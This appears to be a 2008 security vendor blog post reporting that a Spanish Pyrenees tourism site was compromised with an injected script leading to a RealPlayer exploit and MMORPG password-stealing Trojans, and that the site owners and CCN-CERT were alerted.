Looking For Pyrenees Travel Info Unwittingly Leads Users to Malware

February 7th, 2008 by Macky Cruz (Technical Communications)

Yet another Web site compromise was discovered by Research Project Manager Ivan Macalintal, this time in Spain.

Spanish tourism and travel site Pyrenees Guide, which provides information on trips to the Pyrenees Mountains, has been discovered to be compromised and serving malicious code.

Examining the source code of the site’s main page, we find the following injected script:

The malicious script serves a URL which leads to yet another URL carrying yet another malicious code, via a hidden iFrame. This leads to one of two malicious URLs — one which attempts to exploit a vulnerability in RealPlayer. Upon initial analysis, the redirection(s) seem(s) to eventually lead to the download of a Trojan, which in turn, downloads a configuration file containing a list of several files that include dozens of MMORPG (Massively Multiplayer Online Role-Playing Game) password stealers (already detected as TSPY_ONLINEG.WN, TSPY_ONLINEG.DTQ, and TSPY_ONLINEG.CZX) and generic packers.

Trend Micro Web Threat Protection protects users from this attack by proactively blocking the related URLs and detecting the files that the attack attempts to download onto the system.

Additional Note: Advanced Threats Researcher Paul Ferguson (a.k.a. “Fergie”) has alerted the domain technical contact (email bounced), the IP owner contact, and the CCN-CERT (Spanish Governmental National Cryptology Center - Computer Security Incident Response Team).